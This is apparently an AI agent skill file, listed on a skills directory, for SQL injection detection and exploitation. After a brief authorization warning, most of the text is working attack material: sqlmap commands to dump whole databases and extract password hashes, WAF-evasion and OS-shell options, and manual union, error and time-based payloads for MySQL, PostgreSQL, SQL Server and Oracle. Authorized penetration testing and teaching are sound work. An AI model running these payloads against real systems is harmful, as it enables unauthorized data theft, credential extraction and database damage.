Skills

exploit-sqli

Installation
SKILL.md

SQL Injection Detection & Exploitation

Authorization Warning

DANGER: SQL injection testing can damage or destroy data in production databases. Always ensure you have:

  • Written permission from the target application owner
  • Isolated testing environment
  • Backups of affected systems
  • Legal compliance with local regulations

Never test SQL injection on production databases without authorization.

Prerequisites

Required tools that must be installed on your system:

  • sqlmap - pip install sqlmap or git clone https://github.com/sqlmapproject/sqlmap

Optional tools:

  • BBQSQL - Semi-automated SQL injection tool
  • NoSQLMap - NoSQL injection testing

Quick Start

Most commonly used commands for SQL injection testing:

Automated SQLMap Scan

sqlmap -u "https://target.com/page?id=1"

POST Request Testing

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

Cookie Testing

sqlmap -u "https://target.com" --cookie="sessionid=abc123"

Common Scenarios

Scenario 1: Basic Parameter Testing

When you need to test a URL parameter for SQL injection:

sqlmap -u "https://target.com/page?id=1"

Parameters:

  • -u - Target URL
  • -p - Specific parameter to test (default: all)
  • --batch - Avoid interactive prompts
  • --random-agent - Use random User-Agent

Example:

sqlmap -u "https://target.com/vuln.php?id=1" --batch --random-agent

Scenario 2: POST Request Injection

When you need to test POST body parameters:

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

From file:

sqlmap -u "https://target.com/login" -d post_data.txt

Scenario 3: Cookie/Header Injection

When you need to test cookies or headers:

# Cookie injection
sqlmap -u "https://target.com" --cookie="sessionid=abc123"

# User-Agent injection
sqlmap -u "https://target.com" --headers="User-Agent: sqlmap"

# Referer injection
sqlmap -u "https://target.com" --referer="https://evil.com"

Multiple headers:

sqlmap -u "https://target.com" -H "Cookie:id=1" -H "User-Agent: test"

Scenario 4: Specific DBMS Testing

When you know or suspect the database type:

sqlmap -u "https://target.com/page?id=1" --dbms=mysql
sqlmap -u "https://target.com/page?id=1" --dbms=postgresql
sqlmap -u "https://target.com/page?id=1" --dbms=sqlserver
sqlmap -u "https://target.com/page?id=1" --dbms=oracle

Scenario 5: Database Enumeration

When you need to extract database information:

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

# List tables
sqlmap -u "https://target.com/page?id=1" -D dbname --tables

# Dump table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump

# Dump all
sqlmap -u "https://target.com/page?id=1" --dump-all

Scenario 6: User Enumeration

When you need to extract user credentials:

# Enumerate database users
sqlmap -u "https://target.com/page?id=1" --users

# Extract password hashes
sqlmap -u "https://target.com/page?id=1" --passwords

# Dump users table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users -C username,password --dump

Scenario 7: Union-Based SQL Injection

Manual testing for Union-based SQLi:

# Test for SQL injection with payload
https://target.com/page?id=1' OR '1'='1
https://target.com/page?id=1' UNION SELECT 1,2,3--
https://target.com/page?id=1' UNION SELECT NULL,version(),NULL--

Determine column count:

id=1' ORDER BY 1--
id=1' ORDER BY 2--
id=1' ORDER BY 3--

Check for string vs integer:

id=1' UNION SELECT 1,'2',3--
id=1' UNION SELECT 1,NULL,NULL--

Scenario 8: Error-Based SQL Injection

When error messages are displayed:

# MySQL error injection
id=1' AND extractvalue(1, concat(0x7e, database(), 0x7e))--
id=1' AND updatexml(1, concat(0x7e, database(), 0x7e), 1)--
id=1' AND exp(~(SELECT * FROM (SELECT database())a))--

# PostgreSQL error injection
id=1' AND cast(version() as int)--
id=1'; CAST(version() AS INT)--

Scenario 9: Blind SQL Injection

When no error messages are returned:

Boolean-based:

id=1' AND 1=1--
id=1' AND 1=2--

Time-based (MySQL):

id=1' AND SLEEP(5)--
id=1' AND BENCHMARK(5000000, MD5(1))--

Time-based (PostgreSQL):

id=1'; SELECT pg_sleep(5)--
id=1'; SELECT extract(epoch from now())-

Scenario 10: WAF Evasion

When WAF blocks injection attempts:

# Use tamper scripts
sqlmap -u "https://target.com/page?id=1" --tamper=space2comments

# Use random agent
sqlmap -u "https://target.com/page?id=1" --random-agent

# Different level
sqlmap -u "https://target.com/page?id=1" --level=1 --risk=1

# Specific technique
sqlmap -u "https://target.com/page?id=1" --technique=U

Injection Testing Workflow

1. Initial Detection

# Automated scan
sqlmap -u "https://target.com/page?id=1" --batch

# Manual quick test
curl "https://target.com/page?id=1'" | grep -i "sql\|mysql\|syntax"
curl "https://target.com/page?id=1\" OR \"1\"=\"2" | grep -i "error"

2. Confirmation

# Confirm with multiple payloads
curl "https://target.com/page?id=1 AND 1=1"
curl "https://target.com/page?id=1 AND 1=2"
curl "https://target.com/page?id=1' OR '1'='1"

3. Fingerprint Database

sqlmap -u "https://target.com/page?id=1" --current-user

4. Enumeration

# Get database info
sqlmap -u "https://target.com/page?id=1" --hostname --current-db --is-dba

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

SQLMap Options Reference

Option Description
-u Target URL
-r Parse log file
-l Load from file
-m Scan multiple targets
-p Test specific parameters
--skip Skip parameters
--dbms Force DBMS
--os Force OS
--tamper Tamper script
--level Test level (1-5)
--risk Risk level (1-3)
--technique Specific technique (B/E/U/S/T)
--batch Non-interactive
--random-agent Random User-Agent
--proxy Use proxy
--delay Delay between requests
--timeout Request timeout
--retries Retry attempts
--string Match string
--not-string Not match string
--regexp Regexp filter
--grep Regexp filter for pages
--crawl Crawl site
--forms Parse forms
--cookie Cookie value
--headers Extra headers
--user-agent Custom User-Agent
--method Force method
--data POST data
-d POST data from file
--dbs Enumerate databases
--tables Enumerate tables
--columns Enumerate columns
--schema Enumerate schema
--dump Dump data
--dump-all Dump all
--search Search
--users Enumerate DB users
--passwords Enumerate password hashes
--priv-esc Privilege escalation
--os-shell OS shell
--os-pwn Meterpreter/OBM shell
--sql-shell SQL shell
--wizard Wizard mode
-v Verbosity (0-6)

Manual Payloads

MySQL Payloads

-- Version detection
' UNION SELECT @@version--

-- Current user
' UNION SELECT user()--

-- Current database
' UNION SELECT database()--

-- All databases
' UNION SELECT schema_name FROM information_schema.schemata--

-- Tables from database
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--

-- Columns from table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Concatenate data
' UNION SELECT CONCAT(username,0x3a,password) FROM users--

PostgreSQL Payloads

-- Version
' UNION SELECT version()--

-- Current user
' UNION SELECT user--

-- Current database
' UNION SELECT current_database()--

-- All databases
' UNION SELECT datname FROM pg_database--

-- Tables
' UNION SELECT tablename FROM pg_tables WHERE schemaname='public'--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

SQL Server Payloads

-- Version
' UNION SELECT @@version--

-- Database
' UNION SELECT DB_NAME()--

-- Tables
' UNION SELECT table_name FROM information_schema.tables--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Databases
' UNION SELECT name FROM master..sysdatabases--

Oracle Payloads

-- Version
' UNION SELECT banner FROM v$version--

-- Tables
' UNION SELECT table_name FROM all_tables WHERE owner=USER--

-- Columns
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--

Testing Checklist

  • URL parameters
  • POST parameters
  • Cookies
  • User-Agent
  • Referer
  • X-Forwarded-For
  • Accept headers
  • JSON body fields
  • GraphQL queries
  • API endpoints

Scenario: Persistent Storage of SQL Injection Findings

When you need to persist SQL injection findings to the database:

# Manual entry after discovering SQL injection
python .claude/skills/exploit-sqli/scripts/sqli_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/login?id=1" \
  --parameter id \
  --payload "1' OR '1'='1" \
  --severity Critical \
  --cvss-score 9.8 \
  --db-type MySQL \
  --subsystem "Web Application"

Parameters:

  • --host-ip - Target host IP (required)
  • --url - Vulnerable URL (required)
  • --parameter - Vulnerable parameter name (required)
  • --payload - Payload used (required)
  • --severity - Severity level (default: High)
  • --cvss-score - CVSS score (0.0-10.0)
  • --db-type - Database type (e.g., MySQL, PostgreSQL)
  • --subsystem - Subsystem name (optional)
  • --title - Vulnerability title (auto-generated if not specified)
  • --description - Vulnerability description

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports

Resources

Scripts

  • scripts/sqli_payload_generator.py - Generate SQL injection payloads
  • scripts/boolean_sqli_tester.py - Test blind SQL injection
  • scripts/response_analyzer.py - Analyze responses for injection clues

References

  • references/sqlmap_guide.md - Comprehensive SQLMap reference
  • references/manual_sqli_techniques.md - Manual injection techniques
  • references/nosql_injection.md - NoSQL injection guide

Assets

  • assets/common_error_payloads.txt - Common error-based payloads
  • assets/time-based_payloads.txt - Time-based blind payloads
  • assets/dbms_fingerprints.txt - Database fingerprinting patterns
Related skills

More from crazymarky/pentest-skills

Installs
9
Repository
crazymarky/pent…t-skills
GitHub Stars
110
First Seen
Mar 30, 2026
Security Audits
Gen Agent Trust HubWarn
SocketWarn
SnykFail